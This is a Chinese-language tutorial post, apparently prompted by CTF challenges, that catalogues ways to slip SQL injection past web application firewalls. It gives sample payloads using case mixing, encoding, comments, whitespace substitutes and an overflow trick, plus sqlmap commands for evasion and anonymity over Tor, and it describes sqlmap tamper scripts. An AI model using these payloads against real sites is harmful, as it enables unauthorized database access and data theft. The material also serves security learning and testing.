sql注入绕过WAF

发表于 | 分类于 |

这几天的CTF题中有好几道题都是sql注入的,但都存在WAF需要绕过,于是整理了一些常见的绕过WAF注入的方法。

在现实sql注入中我们也常常碰到WAF,那么掌握常见的绕过很有必要。

0x01、手工注入绕过

1、大小写混合

例如:uNIoN sELecT 1,2,3,4

只适用于针对大小写关键字的匹配

2、替换关键字

例如:UNIunionON SELselectECT 1,2,3,4

3、使用编码

URL编码

如:空格变为%20、单引号%27、左括号%28、右括号%29,有时候两次编码绕过%252f%252a*/UNION%252f%252a /SELECT

十六进制编码

可以对单个字符进行十六进制编码绕过,亦可以对整个字符串进行编码绕过。

Unicode编码

单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7

空格:%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0

左括号:%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8

右括号:%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9

4、使用注释

常见注释符号://, – , /**/, #, –+,– -, ;,–a

普通注释

%55nION/**/%53ElecT 1,2,3,4

内联注释 /!**/只有MySQL能识别

/ !UNION / / !SELECT / 1,2,3

5、等价函数或命令

hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()

and和or有时候不能使用,可以使用&&和||;还有=不能使用的情况,可以考虑尝试<、>,因为如果不小于又不大于,那边是等于了

对于空格的绕过,可以使用如下符号绕过:%20 %09 %0a %0b %0c %0d %a0 /**/

6、特殊符号

1、使用反引号`

例如select version(),可以用来过空格和正则,特殊情况下还可以将其做注释符用

2、使用”-+.”

elect+id-1+1.from users; “+”是用于字符串连接的,”-”和”.”在此也用于连接,可以逃过空格和关键字过滤

3、@符号

select@^ 1.from users; @用于变量定义如@var_name,一个@表示用户定义,@@表示系统变量

7、加括号

例如:/?id=(1)union(select(1),mid(hash,1,32)from(users))

8、缓冲区溢出

不少WAF都是由C语言编写的,而C语言缓冲区保护机制。如何WAF在处理测试向量时超出其缓冲区长度,就会引发bug从而实现绕过

例如:id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15–-+

其中0xAAAAAAAAAAAAAAAAAAAAA这里A越多越好,一般来说对应用软件构成缓冲区溢出都需要较大的测试长度,一般要求1000个以上

参考资料:http://netsecurity.51cto.com/art/201301/376869.htm

0x02、Sqlmap注入绕过

当我们使用sqlmap注入遇到WAF时,可以使用sqlmap中的tamper,它里面有很多实用的防过滤脚本

首先我们需要确定WAF过滤了那些关键字,比如:单引号、空格、select、union、admin等,当我们确定了过滤机制可以使用tamper进行绕过

如何判断使用那个过滤脚本,最简单的办法就是直接在URL手工带入进行测试,根据返回信息进行判断

使用sqlmap确认是否含有WAF

sqlmap -u "http://xxx?id=51&types=4" --thread 10 --identify-waf

使用参数进行绕过

root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
 root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
  root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时
  root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入    
  root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --ignore-proxy#禁止使用系统的代理,直接连接进行注入
 root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --flush-session#清空会话,重构注入
 root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --hex#或者使用参数 --no-cast ,进行字符码转换
 root@kali:~# sqlmap -u "http://xxxx?id=51&types=4"  --mobile #对移动端的服务器进行注入
 root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --tor # 匿名注入

使用脚本绕过

root@kali:~# sqlmap -u "http://xxxx?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B

还可以同时使用多个脚本,使用-v参数观察payload的变化

常见脚本种类:

apostrophemask.py

作用:用UTF8代替引号

equaltolike.py

作用:like代替等号

space2dash.py

作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

greatest.py

绕过过滤’>’ ,用GREATEST替换大于号

space2hash.py

作用:空格替换为#号 随机字符串 以及换行符

apostrophenullencode.py

绕过过滤双引号,替换字符和双引号。

halfversionedmorekeywords.py

当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

space2morehash.py

空格替换为 #号 以及更多随机字符串 换行符

appendnullbyte.py

作用:在有效负荷结束位置加载零字节字符编码

ifnull2ifisnull.py

作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

space2mssqlblank.py(mssql)

作用:空格替换为其它空符号

base64encode.py

作用:用base64编码替换

space2mssqlhash.py

作用:替换空格

modsecurityversioned.py

作用:过滤空格,包含完整的查询版本注释

space2mysqlblank.py

作用:空格替换其它空白符号(mysql)

between.py

作用:用between替换大于号(>)

space2mysqldash.py

作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
注:之前有个mssql的 这个是mysql的

multiplespaces.py

作用:围绕SQL关键字添加多个空格

space2plus.py

作用:用+替换空格

bluecoat.py

作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

nonrecursivereplacement.py

作用:双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

space2randomblank.py

作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

sp_password.py

作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

chardoubleencode.py

作用: 双url编码(不处理以编码的)

unionalltounion.py

作用:替换UNION ALL SELECT UNION SELECT

charencode.py

作用:url编码

randomcase.py

作用:随机大小写

unmagicquotes.py

作用:宽字符绕过 GPC addslashes

randomcomments.py

作用:用/ /分割sql关键字

charunicodeencode.py

作用:字符串 unicode 编码

securesphere.py

作用:追加特制的字符串

versionedmorekeywords.py

作用:注释绕过

space2comment.py

作用:Replaces space character (‘ ‘) with comments ‘/ /‘

halfversionedmorekeywords.py

作用:关键字前加注释

参考资料:http://www.cnblogs.com/lcamry/articles/5622584.html
http://www.vuln.cn/2086